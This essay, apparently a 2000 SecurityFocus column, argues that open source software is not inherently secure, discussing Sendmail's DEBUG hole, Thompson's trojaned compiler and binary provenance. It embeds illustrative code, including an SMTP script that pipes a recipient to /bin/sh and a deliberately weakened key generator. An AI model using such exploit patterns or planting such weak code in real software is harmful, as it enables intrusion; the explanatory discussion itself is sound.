Wide Open Source
Elias Levy, SecurityFocus 2000-04-17

Is Open Source really more secure than closed? Elias Levy says there's a little security in obscurity.

One of the great rallying cries from the Open Source community is the assertion that Open Source Software (OSS) is, by its very nature, less likely to contain security vulnerabilities, including back doors, than closed source software. The reality is far more complex and nuanced.

Advocates derive their dogmatic faith in the implicit security of Open Source code from the concept of "peer review," a cornerstone of the scientific process in which published papers and theories are scrutinized by experts other than the authors. The more peers that review the work, the less likely it is that it will contain errors, and the more likely it is to become accepted.

Open Source apostles believe that releasing the source code for a piece of software subjects it to the same kind of peer review as a quantum physics theory published in a scientific journal. Other programmers, the theory goes, will review the code for security vulnerabilities, reveal and fix them, and thus the number of new vulnerabilities introduced and discovered in the software will decrease over time when compared to similar closed source software.

It's a nice theory, and in the ideal Open Source world, it would even be true. But in the real world, there are a variety of factors that affect how secure Open Source Software really is.

Sure, the source code is available. But is anyone reading it?

If Open Source were the panacea some think it is, then every security hole described, fixed and announced to the public would come from people analyzing the source code for security vulnerabilities, such as the folks at OpenBSD, the Linux Auditing Project, or the developers or users of the application.

But there have been plenty of security vulnerabilities in Open Source Software that were discovered, not by peer review, but by black hats. Some security holes aren't discovered by the good guys until an attacker's tools are found on a compromised site, network traffic captured during an intrusion turns up signs of the exploit, or knowledge of the bug finally bubbles up from the underground.

Why is this? When the security company Trusted Information Systems (TIS) began making the source code of their Gauntlet firewall available to their customers many years ago, they believed that their clients would check for themselves how secure the product was. What they found instead was that very few people outside of TIS ever sent in feedback, bug reports or vulnerabilities. Nobody, it seems, is reading the source.

The fact is, most open source users run the software, but don't personally read the code. They just assume that someone else will do the auditing for them, and too often, it's the bad guys.

Even if people are reviewing the code, that doesn't mean they're qualified to do so.

In the scientific world, peer review works because the people doing the reviewing possess a technical caliber, and a level of authority on the subject matter, comparable to or higher than the author's.

It is generally true that the more people reviewing a piece of code, the less likely it is the code will have a security flaw. But a single well-trained reviewer who understands security and what the code is trying to accomplish will be more effective than a hundred people who just recently learned how to program.

It is easy to hide vulnerabilities in complex, little understood and undocumented source code.

Old versions of the Sendmail mail transport agent implemented a DEBUG SMTP command that allowed the connecting user to specify a set of commands instead of an email address to receive the message. This was one of the vulnerabilities exploited by the notorious Morris Internet worm.

Sendmail is one of the oldest examples of open source software, yet this vulnerability, and many others, lay unfixed for a long time. For years Sendmail was plagued by security problems, because this monolithic program was very large, complicated, and understood by only a few.
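To make the DEBUG hole concrete, here is a loose, hypothetical Python reconstruction of the kind of SMTP dialogue it allowed. The host name, the exact commands and the recipient syntax are illustrative guesses, not the worm's actual traffic, and no modern mailer accepts any of this.

    import socket

    # Illustrative only: once the old DEBUG mode was enabled, a recipient
    # could name a command pipeline instead of a mailbox.
    # "victim.example.com" is a placeholder host.
    HOST, PORT = "victim.example.com", 25

    def send(sock, line):
        """Send one CRLF-terminated SMTP line and print the reply."""
        sock.sendall(line.encode() + b"\r\n")
        print(sock.recv(4096).decode(errors="replace"), end="")

    with socket.create_connection((HOST, PORT)) as s:
        print(s.recv(4096).decode(errors="replace"), end="")   # server banner
        send(s, "HELO attacker.example.com")
        send(s, "DEBUG")                     # switch the old Sendmail into debug mode
        send(s, "MAIL FROM:<nobody>")
        send(s, 'RCPT TO:<"| /bin/sh">')     # a pipeline, not an email address
        send(s, "DATA")
        # The message body becomes the pipeline's input; only the final "."
        # draws a reply from the server.
        s.sendall(b"commands for the remote shell would go here\r\n")
        send(s, ".")
        send(s, "QUIT")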

Vulnerabilities can be a lot more subtle than the Sendmail DEBUG command. How many people really understand the ins and outs of a kernel-based NFS server? Are we sure it's not leaking file handles in some instances? Ssh 1.2.27 is over seventy-one thousand lines of code (client and server). Are we sure a subtle flaw isn't weakening its key strength to only 40 bits?
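As a purely hypothetical illustration of how subtle such a flaw can be (this is not ssh code), the sketch below produces what looks like a 128-bit key while silently drawing it from only 40 bits of randomness. Buried among tens of thousands of lines, a bug like this is easy to read past.

    import os
    import random

    def generate_session_key(bits=128):
        """Generate what is meant to be a `bits`-bit random session key."""
        # Subtle bug: the key is expanded from a PRNG seeded with only
        # 5 bytes (40 bits) of real randomness, so there are at most
        # 2**40 possible keys -- brute-forceable, yet every key still
        # "looks" random in a casual test.
        seed = int.from_bytes(os.urandom(5), "big")
        rng = random.Random(seed)
        return rng.getrandbits(bits).to_bytes(bits // 8, "big")

    print(generate_session_key().hex())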

There is no strong guarantee that source code and binaries of an application have any real relationship.

All the benefits of source code peer review are irrelevant if you cannot be certain that a given binary application is the result of the reviewed source code.

Ken Thompson made this very clear during his 1983 Turing Award lecture to the ACM, in which he revealed a shocking, and subtle, software subversion technique that's still illustrative seventeen years later.

Thompson modified the UNIX C compiler to recognize when the login program was being compiled, and to insert a back door in the resulting binary code such that it would allow him to login as any user using a "magic" password.

Anyone reviewing the compiler source code could have found the back door, except that Thompson then modified the compiler so that whenever it compiled itself, it would insert both the code that plants the login back door and the code that perpetuates this self-modification. With that new binary in place, he removed his modifications from the source and recompiled again.

He now had a trojaned compiler and clean source code. Anyone using his compiler to compile either the login program or the compiler itself would propagate his back doors.
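A toy model of the trick, heavily simplified and written in Python rather than C, might look like the sketch below. The function and pattern names are invented for illustration, and the real attack operated on generated machine code, not appended source.

    def trojaned_compile(source):
        """A toy stand-in for Thompson's subverted compiler.

        It "compiles" by passing the source through unchanged, except for
        two special cases it recognizes and silently rewrites.
        """
        LOGIN_BACKDOOR = '\nif password == "magic": grant_access()  # hidden back door\n'
        SELF_REINFECT = "\n# ...code that re-inserts both back doors when the compiler compiles itself...\n"

        if "def check_password(" in source:      # is this the login program?
            source += LOGIN_BACKDOOR             # accept the magic password
        if "def trojaned_compile(" in source:    # is the compiler compiling itself?
            source += SELF_REINFECT              # keep the subversion alive
        return source                            # everything else compiles faithfully

Once a binary built this way is in circulation, the published source of both the login program and the compiler can be perfectly clean, and every rebuild still carries the back doors.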

The reason his attack worked is that the compiler has a bootstrapping problem: you need a compiler to compile the compiler. You must obtain a binary copy of the compiler before you can use it to translate the compiler's source code into a binary. There was no guarantee that the binary compiler you were using was really related to its published source code.

Most applications do not have this bootstrapping problem. But how many users of open source software compile all of their applications from source?

A great number of open source users install precompiled software distributions, such as those from RedHat or Debian, from CD-ROMs or FTP sites without thinking twice about whether the binary applications have any real relationship to their source code.

While some of the binaries are cryptographically signed to verify the identity of the packager, the signatures make no other guarantees. Until the day comes when a trusted distributor of binary open source software can issue a strong cryptographic guarantee that a particular binary is the result of a given source, any security expectations one may have about the source can't be transferred to the binary.
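A minimal sketch of what that kind of guarantee might rest on, assuming a hypothetical, bit-for-bit reproducible build (same compiler, flags and timestamps; the paths and build command below are placeholders): rebuild the package from the audited source and compare digests with the distributed binary.

    import hashlib
    import subprocess
    import sys

    def sha256(path):
        """Return the SHA-256 digest of a file, read in chunks."""
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()

    def matches_source(shipped_binary, build_command, rebuilt_binary):
        """Rebuild from audited source and compare against the shipped binary.

        Only meaningful if the build is fully reproducible, which very few
        packages of this era could claim.
        """
        subprocess.run(build_command, check=True)
        return sha256(rebuilt_binary) == sha256(shipped_binary)

    if __name__ == "__main__":
        ok = matches_source("/usr/sbin/sendmail",            # hypothetical shipped binary
                            ["make", "-C", "sendmail-src"],  # hypothetical audited tree
                            "sendmail-src/obj/sendmail")     # hypothetical rebuilt binary
        sys.exit(0 if ok else 1)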

Open Source makes it easy for the bad guys to find vulnerabilities.

Whatever potential Open Source has to make it easy for the good guys to proactively find security vulnerabilities also extends to the bad guys.

It is true that a black hat can find vulnerabilities in a binary-only application, and that they can attempt to steal the application's closed source code. But in the time it takes to do that, they can audit ten different open source applications for vulnerabilities. A bad guy who can operate a hex editor can probably manage to grep source code for 'strcpy'.
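A first pass at exactly that kind of audit takes only a few lines of scripting; the function list and the default directory below are placeholders, and a real review would of course go much deeper.

    import re
    import sys
    from pathlib import Path

    # Classic C string functions that invite buffer overflows.  Flagging a
    # call is not the same as finding a bug, but it tells an attacker (or a
    # defender) exactly which lines to stare at first.
    RISKY = re.compile(r"\b(strcpy|strcat|sprintf|vsprintf|gets)\s*\(")

    def scan(tree="."):
        for path in Path(tree).rglob("*.c"):
            for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
                if RISKY.search(line):
                    print(f"{path}:{lineno}: {line.strip()}")

    if __name__ == "__main__":
        scan(sys.argv[1] if len(sys.argv) > 1 else ".")   # e.g. an unpacked source tarball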

Security through obscurity is not something you should depend on, but it can be an effective deterrent if the attacker can find an easier target.

So does all this mean Open Source Software is no better than closed source software when it comes to security vulnerabilities? No. Open Source Software certainly does have the potential to be more secure than its closed source counterpart.

But make no mistake, simply being open source is no guarantee of security.
